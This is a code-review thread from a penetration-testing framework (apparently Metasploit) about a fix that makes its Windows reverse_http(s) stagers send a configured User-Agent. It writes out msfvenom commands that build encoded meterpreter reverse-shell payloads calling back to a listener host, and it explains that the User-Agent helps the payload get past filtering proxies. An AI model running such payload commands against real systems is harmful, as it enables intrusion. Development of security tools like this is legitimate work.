### PR TITLE
set user agent in Windows reverse_http(s) stagers

### LINKED ISSUE #11075: Bug when setting a User-Agent string in the reverse_https stager shellcode
## Steps to reproduce

How'd you do it?

When I build my shellcode using the following command:

msfvenom -e @x64/zutto_dekiru,x64/evader,x64/xor,x64/evader,x64/zutto_dekiru,x64/evader,x64/evader,x64/xor -p windows/x64/meterpreter/reverse_https ReverseAllowProxy=true HttpUserAgent=foobar HandlerSSLCert=/root/www.whatever12345.com.pem LHOST=www.whatever12345.com LPORT=443 EXITFUNC=thread -f c > /root/https_reverse.c

The first request which leaves the victim machine after executing the stager's shellcode does not have a user-agent even though it was specified in the msfvenom command (HttpUserAgent=foobar):

capture

## Expected behavior

The very first request to hit the multi/handler should have a user-agent...Otherwise it will simply die at the proxy if it filters based on user-agents.

## Current behavior

What happens instead?

no user agent string is sent by the stager shellcode...

### PR DESCRIPTION
**Pull request by busterb**
Fix #11075 set the user agent in Windows reverse_http(s) payloads.

## Verification

- [x] Generate a payload like `./msfvenom -p windows/meterpreter/reverse_http HttpUserAgent=Monkeycom  lhost=192.168.56.1 -f exe -o test.exe`
- [x] Start a listener and verify that the HTTP GET header initially contains the correct user agent.

### CODE REVIEW

**Comment by busterb** [comment]
Note, this probably needs a switch so it actually sets a NULL instead of empty string when UA is not specified. I haven't tested it yet.

**Comment by busterb** [comment]
Updated to handle the empty UA case as well.

File: lib/msf/core/payload/windows/reverse_http.rb [hunk 1]
```diff
@@ -255,32 +255,43 @@ def asm_reverse_http(opts={})
...
+      asm << %Q^
         push ebx               ; LPCTSTR lpszAgent (NULL)
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
-        call ebp
+      ^
+    else
+      asm << %Q^
+        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
+      call get_useragent
+        db "#{opts[:ua]}", 0x00
```
Comment (OJ) [inline lib/msf/core/payload/windows/reverse_http.rb]: Do we have to cater for the (admittedly stupid) case where someone puts a `"` in the agent name?

**Review by OJ — APPROVED** [review]
Looks good to me. Edge case where the use of a `"` in the UA string could cause metasm to barf. Can't think of why anyone would do that but, hey.

**Comment by sempervictus** [comment]
We need better barf bags for metasm. Tracking down generation bugs is like autodentistry.

**Comment by OJ** [comment]
Meterpreter won't care about the quote. It just takes what you give it and
adds it to the appropriate header.

File: lib/msf/core/payload/windows/reverse_http.rb (hunk 1 above)
Comment (busterb) [reply lib/msf/core/payload/windows/reverse_http.rb]: Hmm, on review I think my thick skull finally figured out what you meant; I'll just relax this to a nil? check instead

**Comment by OJ** [comment]
My point is that metasm will fail to compile the stager if you do this:

set HttpUserAgent 'this will"break metasm'

File: lib/msf/core/payload/windows/reverse_http.rb (hunk 1 above)
Comment (busterb) [reply lib/msf/core/payload/windows/reverse_http.rb]: OK, updated.

**Comment by wchen-r7** [comment]
Verified:

screen shot 2018-12-19 at 11 37 13 am

**Comment by wchen-r7** [comment]
# Release Notes

This allows the HTTP/HTTPS payloads to be able to use an arbitrary user-agent for the initial GET request.

**Comment by pussinboots1992** [comment]
Thanks guys !
